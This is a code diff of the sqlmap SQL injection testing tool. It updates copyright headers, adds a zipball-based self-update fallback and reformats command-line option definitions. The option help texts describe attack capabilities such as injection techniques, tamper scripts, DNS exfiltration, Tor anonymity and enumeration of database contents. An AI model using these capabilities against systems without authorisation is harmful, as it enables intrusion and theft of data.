if conf.verbose > 1:
|
||||||
|
traceback.print_exc()
|
||||||
|
|
||||||
except:
|
except:
|
||||||
from lib.core.common import unhandledExceptionMessage
|
from lib.core.common import unhandledExceptionMessage
|
||||||
|
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
|
|||||||
@@ -1,25 +1,34 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import locale
|
import glob
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
|
import shutil
|
||||||
import subprocess
|
import subprocess
|
||||||
|
import sys
|
||||||
import time
|
import time
|
||||||
|
import urllib
|
||||||
|
import zipfile
|
||||||
|
|
||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
from lib.core.common import getSafeExString
|
from lib.core.common import getSafeExString
|
||||||
|
from lib.core.common import getLatestRevision
|
||||||
from lib.core.common import pollProcess
|
from lib.core.common import pollProcess
|
||||||
|
from lib.core.common import readInput
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
from lib.core.revision import getRevisionNumber
|
from lib.core.revision import getRevisionNumber
|
||||||
from lib.core.settings import GIT_REPOSITORY
|
from lib.core.settings import GIT_REPOSITORY
|
||||||
from lib.core.settings import IS_WIN
|
from lib.core.settings import IS_WIN
|
||||||
|
from lib.core.settings import VERSION
|
||||||
|
from lib.core.settings import ZIPBALL_PAGE
|
||||||
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
|
||||||
def update():
|
def update():
|
||||||
if not conf.updateAll:
|
if not conf.updateAll:
|
||||||
@@ -28,11 +37,66 @@ def update():
|
|||||||
success = False
|
success = False
|
||||||
|
|
||||||
if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")):
|
if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")):
|
||||||
errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
|
warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository "
|
||||||
errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')"
|
warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
|
||||||
logger.error(errMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if VERSION == getLatestRevision():
|
||||||
|
logger.info("already at the latest revision '%s'" % getRevisionNumber())
|
||||||
|
return
|
||||||
|
|
||||||
|
message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]"
|
||||||
|
if readInput(message, default='N', boolean=True):
|
||||||
|
directory = os.path.abspath(paths.SQLMAP_ROOT_PATH)
|
||||||
|
|
||||||
|
try:
|
||||||
|
open(os.path.join(directory, "sqlmap.py"), "w+b")
|
||||||
|
except Exception, ex:
|
||||||
|
errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex))
|
||||||
|
logger.error(errMsg)
|
||||||
|
else:
|
||||||
|
attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode
|
||||||
|
for wildcard in ('*', ".*"):
|
||||||
|
for _ in glob.glob(os.path.join(directory, wildcard)):
|
||||||
|
try:
|
||||||
|
if os.path.isdir(_):
|
||||||
|
shutil.rmtree(_)
|
||||||
|
else:
|
||||||
|
os.remove(_)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
if glob.glob(os.path.join(directory, '*')):
|
||||||
|
errMsg = "unable to clear the content of directory '%s'" % directory
|
||||||
|
logger.error(errMsg)
|
||||||
|
else:
|
||||||
|
try:
|
||||||
|
archive = urllib.urlretrieve(ZIPBALL_PAGE)[0]
|
||||||
|
|
||||||
|
with zipfile.ZipFile(archive) as f:
|
||||||
|
for info in f.infolist():
|
||||||
|
info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename)
|
||||||
|
if info.filename:
|
||||||
|
f.extract(info, directory)
|
||||||
|
|
||||||
|
filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py")
|
||||||
|
if os.path.isfile(filepath):
|
||||||
|
with open(filepath, "rb") as f:
|
||||||
|
version = re.search(r"(?m)^VERSION\s*=\s*['\"]([^'\"]+)", f.read()).group(1)
|
||||||
|
logger.info("updated to the latest version '%s#dev'" % version)
|
||||||
|
success = True
|
||||||
|
except Exception, ex:
|
||||||
|
logger.error("update could not be completed ('%s')" % getSafeExString(ex))
|
||||||
|
else:
|
||||||
|
if not success:
|
||||||
|
logger.error("update could not be completed")
|
||||||
|
else:
|
||||||
|
try:
|
||||||
|
os.chmod(os.path.join(directory, "sqlmap.py"), attrs)
|
||||||
|
except OSError:
|
||||||
|
logger.warning("could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py"))
|
||||||
else:
|
else:
|
||||||
infoMsg = "updating sqlmap to the latest development version from the "
|
infoMsg = "updating sqlmap to the latest development revision from the "
|
||||||
infoMsg += "GitHub repository"
|
infoMsg += "GitHub repository"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
@@ -42,7 +106,7 @@ def update():
|
|||||||
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
|
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
|
||||||
|
|
||||||
try:
|
try:
|
||||||
process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding())) # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/
|
process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
|
||||||
pollProcess(process, True)
|
pollProcess(process, True)
|
||||||
stdout, stderr = process.communicate()
|
stdout, stderr = process.communicate()
|
||||||
success = not process.returncode
|
success = not process.returncode
|
||||||
@@ -55,7 +119,7 @@ def update():
|
|||||||
else:
|
else:
|
||||||
if "Not a git repository" in stderr:
|
if "Not a git repository" in stderr:
|
||||||
errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
|
errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
|
||||||
errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')"
|
errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
else:
|
else:
|
||||||
logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())
|
logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())
|
||||||
@@ -68,7 +132,7 @@ def update():
|
|||||||
infoMsg += "download the latest snapshot from "
|
infoMsg += "download the latest snapshot from "
|
||||||
infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads"
|
infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads"
|
||||||
else:
|
else:
|
||||||
infoMsg = "for Linux platform it's required "
|
infoMsg = "for Linux platform it's recommended "
|
||||||
infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"
|
infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"
|
||||||
|
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
@@ -47,7 +47,7 @@ class Wordlist(object):
|
|||||||
errMsg = "something appears to be wrong with "
|
errMsg = "something appears to be wrong with "
|
||||||
errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
|
errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
|
||||||
errMsg += "sure that you haven't made any changes to it"
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
raise SqlmapInstallationException, errMsg
|
raise SqlmapInstallationException(errMsg)
|
||||||
if len(_.namelist()) == 0:
|
if len(_.namelist()) == 0:
|
||||||
errMsg = "no file(s) inside '%s'" % self.current
|
errMsg = "no file(s) inside '%s'" % self.current
|
||||||
raise SqlmapDataException(errMsg)
|
raise SqlmapDataException(errMsg)
|
||||||
@@ -73,7 +73,7 @@ class Wordlist(object):
|
|||||||
errMsg = "something appears to be wrong with "
|
errMsg = "something appears to be wrong with "
|
||||||
errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
|
errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
|
||||||
errMsg += "sure that you haven't made any changes to it"
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
raise SqlmapInstallationException, errMsg
|
raise SqlmapInstallationException(errMsg)
|
||||||
except StopIteration:
|
except StopIteration:
|
||||||
self.adjust()
|
self.adjust()
|
||||||
retVal = self.iter.next().rstrip()
|
retVal = self.iter.next().rstrip()
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import re
|
import re
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
@@ -50,9 +50,7 @@ def cmdLineParser(argv=None):
|
|||||||
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
||||||
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
|
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
|
||||||
|
|
||||||
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
usage = "%s%s [options]" % ("python " if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _)
|
||||||
"\"%s\"" % _ if " " in _ else _)
|
|
||||||
|
|
||||||
parser = OptionParser(usage=usage)
|
parser = OptionParser(usage=usage)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
@@ -115,15 +113,13 @@ def cmdLineParser(argv=None):
|
|||||||
request.add_option("--load-cookies", dest="loadCookies",
|
request.add_option("--load-cookies", dest="loadCookies",
|
||||||
help="File containing cookies in Netscape/wget format")
|
help="File containing cookies in Netscape/wget format")
|
||||||
|
|
||||||
request.add_option("--drop-set-cookie", dest="dropSetCookie",
|
request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Ignore Set-Cookie header from response")
|
help="Ignore Set-Cookie header from response")
|
||||||
|
|
||||||
request.add_option("--user-agent", dest="agent",
|
request.add_option("--user-agent", dest="agent",
|
||||||
help="HTTP User-Agent header value")
|
help="HTTP User-Agent header value")
|
||||||
|
|
||||||
request.add_option("--random-agent", dest="randomAgent",
|
request.add_option("--random-agent", dest="randomAgent", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use randomly selected HTTP User-Agent header value")
|
help="Use randomly selected HTTP User-Agent header value")
|
||||||
|
|
||||||
request.add_option("--host", dest="host",
|
request.add_option("--host", dest="host",
|
||||||
@@ -139,62 +135,55 @@ def cmdLineParser(argv=None):
|
|||||||
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
||||||
|
|
||||||
request.add_option("--auth-type", dest="authType",
|
request.add_option("--auth-type", dest="authType",
|
||||||
help="HTTP authentication type "
|
help="HTTP authentication type (Basic, Digest, NTLM or PKI)")
|
||||||
"(Basic, Digest, NTLM or PKI)")
|
|
||||||
|
|
||||||
request.add_option("--auth-cred", dest="authCred",
|
request.add_option("--auth-cred", dest="authCred",
|
||||||
help="HTTP authentication credentials "
|
help="HTTP authentication credentials (name:password)")
|
||||||
"(name:password)")
|
|
||||||
|
|
||||||
request.add_option("--auth-file", dest="authFile",
|
request.add_option("--auth-file", dest="authFile",
|
||||||
help="HTTP authentication PEM cert/private key file")
|
help="HTTP authentication PEM cert/private key file")
|
||||||
|
|
||||||
request.add_option("--ignore-401", dest="ignore401", action="store_true",
|
request.add_option("--ignore-code", dest="ignoreCode", type="int",
|
||||||
help="Ignore HTTP Error 401 (Unauthorized)")
|
help="Ignore HTTP error code (e.g. 401)")
|
||||||
|
|
||||||
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
|
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
|
||||||
help="Ignore system default proxy settings")
|
help="Ignore system default proxy settings")
|
||||||
|
|
||||||
request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true",
|
request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true",
|
||||||
help="Ignore redirection attempts")
|
help="Ignore redirection attempts")
|
||||||
|
|
||||||
request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true",
|
request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true",
|
||||||
help="Ignore connection timeouts")
|
help="Ignore connection timeouts")
|
||||||
|
|
||||||
request.add_option("--proxy", dest="proxy",
|
request.add_option("--proxy", dest="proxy",
|
||||||
help="Use a proxy to connect to the target URL")
|
help="Use a proxy to connect to the target URL")
|
||||||
|
|
||||||
request.add_option("--proxy-cred", dest="proxyCred",
|
request.add_option("--proxy-cred", dest="proxyCred",
|
||||||
help="Proxy authentication credentials "
|
help="Proxy authentication credentials (name:password)")
|
||||||
"(name:password)")
|
|
||||||
|
|
||||||
request.add_option("--proxy-file", dest="proxyFile",
|
request.add_option("--proxy-file", dest="proxyFile",
|
||||||
help="Load proxy list from a file")
|
help="Load proxy list from a file")
|
||||||
|
|
||||||
request.add_option("--tor", dest="tor",
|
request.add_option("--tor", dest="tor", action="store_true",
|
||||||
action="store_true",
|
help="Use Tor anonymity network")
|
||||||
help="Use Tor anonymity network")
|
|
||||||
|
|
||||||
request.add_option("--tor-port", dest="torPort",
|
request.add_option("--tor-port", dest="torPort",
|
||||||
help="Set Tor proxy port other than default")
|
help="Set Tor proxy port other than default")
|
||||||
|
|
||||||
request.add_option("--tor-type", dest="torType",
|
request.add_option("--tor-type", dest="torType",
|
||||||
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
|
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
|
||||||
|
|
||||||
request.add_option("--check-tor", dest="checkTor",
|
request.add_option("--check-tor", dest="checkTor", action="store_true",
|
||||||
action="store_true",
|
help="Check to see if Tor is used properly")
|
||||||
help="Check to see if Tor is used properly")
|
|
||||||
|
|
||||||
request.add_option("--delay", dest="delay", type="float",
|
request.add_option("--delay", dest="delay", type="float",
|
||||||
help="Delay in seconds between each HTTP request")
|
help="Delay in seconds between each HTTP request")
|
||||||
|
|
||||||
request.add_option("--timeout", dest="timeout", type="float",
|
request.add_option("--timeout", dest="timeout", type="float",
|
||||||
help="Seconds to wait before timeout connection "
|
help="Seconds to wait before timeout connection (default %d)" % defaults.timeout)
|
||||||
"(default %d)" % defaults.timeout)
|
|
||||||
|
|
||||||
request.add_option("--retries", dest="retries", type="int",
|
request.add_option("--retries", dest="retries", type="int",
|
||||||
help="Retries when the connection timeouts "
|
help="Retries when the connection timeouts (default %d)" % defaults.retries)
|
||||||
"(default %d)" % defaults.retries)
|
|
||||||
|
|
||||||
request.add_option("--randomize", dest="rParam",
|
request.add_option("--randomize", dest="rParam",
|
||||||
help="Randomly change value for given parameter(s)")
|
help="Randomly change value for given parameter(s)")
|
||||||
@@ -211,8 +200,7 @@ def cmdLineParser(argv=None):
|
|||||||
request.add_option("--safe-freq", dest="safeFreq", type="int",
|
request.add_option("--safe-freq", dest="safeFreq", type="int",
|
||||||
help="Test requests between two visits to a given safe URL")
|
help="Test requests between two visits to a given safe URL")
|
||||||
|
|
||||||
request.add_option("--skip-urlencode", dest="skipUrlEncode",
|
request.add_option("--skip-urlencode", dest="skipUrlEncode", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Skip URL encoding of payload data")
|
help="Skip URL encoding of payload data")
|
||||||
|
|
||||||
request.add_option("--csrf-token", dest="csrfToken",
|
request.add_option("--csrf-token", dest="csrfToken",
|
||||||
@@ -221,44 +209,36 @@ def cmdLineParser(argv=None):
|
|||||||
request.add_option("--csrf-url", dest="csrfUrl",
|
request.add_option("--csrf-url", dest="csrfUrl",
|
||||||
help="URL address to visit to extract anti-CSRF token")
|
help="URL address to visit to extract anti-CSRF token")
|
||||||
|
|
||||||
request.add_option("--force-ssl", dest="forceSSL",
|
request.add_option("--force-ssl", dest="forceSSL", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Force usage of SSL/HTTPS")
|
help="Force usage of SSL/HTTPS")
|
||||||
|
|
||||||
request.add_option("--hpp", dest="hpp",
|
request.add_option("--hpp", dest="hpp", action="store_true",
|
||||||
action="store_true",
|
help="Use HTTP parameter pollution method")
|
||||||
help="Use HTTP parameter pollution method")
|
|
||||||
|
|
||||||
request.add_option("--eval", dest="evalCode",
|
request.add_option("--eval", dest="evalCode",
|
||||||
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
||||||
|
|
||||||
# Optimization options
|
# Optimization options
|
||||||
optimization = OptionGroup(parser, "Optimization", "These "
|
optimization = OptionGroup(parser, "Optimization", "These options can be used to optimize the performance of sqlmap")
|
||||||
"options can be used to optimize the "
|
|
||||||
"performance of sqlmap")
|
|
||||||
|
|
||||||
optimization.add_option("-o", dest="optimize",
|
optimization.add_option("-o", dest="optimize", action="store_true",
|
||||||
action="store_true",
|
help="Turn on all optimization switches")
|
||||||
help="Turn on all optimization switches")
|
|
||||||
|
|
||||||
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
|
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
|
||||||
help="Predict common queries output")
|
help="Predict common queries output")
|
||||||
|
|
||||||
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
|
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
|
||||||
help="Use persistent HTTP(s) connections")
|
help="Use persistent HTTP(s) connections")
|
||||||
|
|
||||||
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
|
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
|
||||||
help="Retrieve page length without actual HTTP response body")
|
help="Retrieve page length without actual HTTP response body")
|
||||||
|
|
||||||
optimization.add_option("--threads", dest="threads", type="int",
|
optimization.add_option("--threads", dest="threads", type="int",
|
||||||
help="Max number of concurrent HTTP(s) "
|
help="Max number of concurrent HTTP(s) "
|
||||||
"requests (default %d)" % defaults.threads)
|
"requests (default %d)" % defaults.threads)
|
||||||
|
|
||||||
# Injection options
|
# Injection options
|
||||||
injection = OptionGroup(parser, "Injection", "These options can be "
|
injection = OptionGroup(parser, "Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts")
|
||||||
"used to specify which parameters to test "
|
|
||||||
"for, provide custom injection payloads and "
|
|
||||||
"optional tampering scripts")
|
|
||||||
|
|
||||||
injection.add_option("-p", dest="testParameter",
|
injection.add_option("-p", dest="testParameter",
|
||||||
help="Testable parameter(s)")
|
help="Testable parameter(s)")
|
||||||
@@ -270,36 +250,30 @@ def cmdLineParser(argv=None):
|
|||||||
help="Skip testing parameters that not appear to be dynamic")
|
help="Skip testing parameters that not appear to be dynamic")
|
||||||
|
|
||||||
injection.add_option("--param-exclude", dest="paramExclude",
|
injection.add_option("--param-exclude", dest="paramExclude",
|
||||||
help="Regexp to exclude parameters from testing (e.g. \"ses\")")
|
help="Regexp to exclude parameters from testing (e.g. \"ses\")")
|
||||||
|
|
||||||
injection.add_option("--dbms", dest="dbms",
|
injection.add_option("--dbms", dest="dbms",
|
||||||
help="Force back-end DBMS to this value")
|
help="Force back-end DBMS to provided value")
|
||||||
|
|
||||||
injection.add_option("--dbms-cred", dest="dbmsCred",
|
injection.add_option("--dbms-cred", dest="dbmsCred",
|
||||||
help="DBMS authentication credentials (user:password)")
|
help="DBMS authentication credentials (user:password)")
|
||||||
|
|
||||||
injection.add_option("--os", dest="os",
|
injection.add_option("--os", dest="os",
|
||||||
help="Force back-end DBMS operating system "
|
help="Force back-end DBMS operating system to provided value")
|
||||||
"to this value")
|
|
||||||
|
|
||||||
injection.add_option("--invalid-bignum", dest="invalidBignum",
|
injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use big numbers for invalidating values")
|
help="Use big numbers for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--invalid-logical", dest="invalidLogical",
|
injection.add_option("--invalid-logical", dest="invalidLogical", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use logical operations for invalidating values")
|
help="Use logical operations for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--invalid-string", dest="invalidString",
|
injection.add_option("--invalid-string", dest="invalidString", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use random strings for invalidating values")
|
help="Use random strings for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--no-cast", dest="noCast",
|
injection.add_option("--no-cast", dest="noCast", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Turn off payload casting mechanism")
|
help="Turn off payload casting mechanism")
|
||||||
|
|
||||||
injection.add_option("--no-escape", dest="noEscape",
|
injection.add_option("--no-escape", dest="noEscape", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Turn off string escaping mechanism")
|
help="Turn off string escaping mechanism")
|
||||||
|
|
||||||
injection.add_option("--prefix", dest="prefix",
|
injection.add_option("--prefix", dest="prefix",
|
||||||
@@ -312,54 +286,40 @@ def cmdLineParser(argv=None):
|
|||||||
help="Use given script(s) for tampering injection data")
|
help="Use given script(s) for tampering injection data")
|
||||||
|
|
||||||
# Detection options
|
# Detection options
|
||||||
detection = OptionGroup(parser, "Detection", "These options can be "
|
detection = OptionGroup(parser, "Detection", "These options can be used to customize the detection phase")
|
||||||
"used to customize the detection phase")
|
|
||||||
|
|
||||||
detection.add_option("--level", dest="level", type="int",
|
detection.add_option("--level", dest="level", type="int",
|
||||||
help="Level of tests to perform (1-5, "
|
help="Level of tests to perform (1-5, default %d)" % defaults.level)
|
||||||
"default %d)" % defaults.level)
|
|
||||||
|
|
||||||
detection.add_option("--risk", dest="risk", type="int",
|
detection.add_option("--risk", dest="risk", type="int",
|
||||||
help="Risk of tests to perform (1-3, "
|
help="Risk of tests to perform (1-3, default %d)" % defaults.risk)
|
||||||
"default %d)" % defaults.risk)
|
|
||||||
|
|
||||||
detection.add_option("--string", dest="string",
|
detection.add_option("--string", dest="string",
|
||||||
help="String to match when "
|
help="String to match when query is evaluated to True")
|
||||||
"query is evaluated to True")
|
|
||||||
|
|
||||||
detection.add_option("--not-string", dest="notString",
|
detection.add_option("--not-string", dest="notString",
|
||||||
help="String to match when "
|
help="String to match when query is evaluated to False")
|
||||||
"query is evaluated to False")
|
|
||||||
|
|
||||||
detection.add_option("--regexp", dest="regexp",
|
detection.add_option("--regexp", dest="regexp",
|
||||||
help="Regexp to match when "
|
help="Regexp to match when query is evaluated to True")
|
||||||
"query is evaluated to True")
|
|
||||||
|
|
||||||
detection.add_option("--code", dest="code", type="int",
|
detection.add_option("--code", dest="code", type="int",
|
||||||
help="HTTP code to match when "
|
help="HTTP code to match when query is evaluated to True")
|
||||||
"query is evaluated to True")
|
|
||||||
|
|
||||||
detection.add_option("--text-only", dest="textOnly",
|
detection.add_option("--text-only", dest="textOnly", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Compare pages based only on the textual content")
|
help="Compare pages based only on the textual content")
|
||||||
|
|
||||||
detection.add_option("--titles", dest="titles",
|
detection.add_option("--titles", dest="titles", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Compare pages based only on their titles")
|
help="Compare pages based only on their titles")
|
||||||
|
|
||||||
# Techniques options
|
# Techniques options
|
||||||
techniques = OptionGroup(parser, "Techniques", "These options can be "
|
techniques = OptionGroup(parser, "Techniques", "These options can be used to tweak testing of specific SQL injection techniques")
|
||||||
"used to tweak testing of specific SQL "
|
|
||||||
"injection techniques")
|
|
||||||
|
|
||||||
techniques.add_option("--technique", dest="tech",
|
techniques.add_option("--technique", dest="tech",
|
||||||
help="SQL injection techniques to use "
|
help="SQL injection techniques to use (default \"%s\")" % defaults.tech)
|
||||||
"(default \"%s\")" % defaults.tech)
|
|
||||||
|
|
||||||
techniques.add_option("--time-sec", dest="timeSec",
|
techniques.add_option("--time-sec", dest="timeSec", type="int",
|
||||||
type="int",
|
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)
|
||||||
help="Seconds to delay the DBMS response "
|
|
||||||
"(default %d)" % defaults.timeSec)
|
|
||||||
|
|
||||||
techniques.add_option("--union-cols", dest="uCols",
|
techniques.add_option("--union-cols", dest="uCols",
|
||||||
help="Range of columns to test for UNION query SQL injection")
|
help="Range of columns to test for UNION query SQL injection")
|
||||||
@@ -373,59 +333,49 @@ def cmdLineParser(argv=None):
|
|||||||
techniques.add_option("--dns-domain", dest="dnsDomain",
|
techniques.add_option("--dns-domain", dest="dnsDomain",
|
||||||
help="Domain name used for DNS exfiltration attack")
|
help="Domain name used for DNS exfiltration attack")
|
||||||
|
|
||||||
techniques.add_option("--second-order", dest="secondOrder",
|
techniques.add_option("--second-url", dest="secondUrl",
|
||||||
help="Resulting page URL searched for second-order "
|
help="Resulting page URL searched for second-order response")
|
||||||
"response")
|
|
||||||
|
techniques.add_option("--second-req", dest="secondReq",
|
||||||
|
help="Load second-order HTTP request from file")
|
||||||
|
|
||||||
# Fingerprint options
|
# Fingerprint options
|
||||||
fingerprint = OptionGroup(parser, "Fingerprint")
|
fingerprint = OptionGroup(parser, "Fingerprint")
|
||||||
|
|
||||||
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp",
|
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Perform an extensive DBMS version fingerprint")
|
help="Perform an extensive DBMS version fingerprint")
|
||||||
|
|
||||||
# Enumeration options
|
# Enumeration options
|
||||||
enumeration = OptionGroup(parser, "Enumeration", "These options can "
|
enumeration = OptionGroup(parser, "Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements")
|
||||||
"be used to enumerate the back-end database "
|
|
||||||
"management system information, structure "
|
|
||||||
"and data contained in the tables. Moreover "
|
|
||||||
"you can run your own SQL statements")
|
|
||||||
|
|
||||||
enumeration.add_option("-a", "--all", dest="getAll",
|
enumeration.add_option("-a", "--all", dest="getAll", action="store_true",
|
||||||
action="store_true", help="Retrieve everything")
|
help="Retrieve everything")
|
||||||
|
|
||||||
enumeration.add_option("-b", "--banner", dest="getBanner",
|
enumeration.add_option("-b", "--banner", dest="getBanner", action="store_true",
|
||||||
action="store_true", help="Retrieve DBMS banner")
|
help="Retrieve DBMS banner")
|
||||||
|
|
||||||
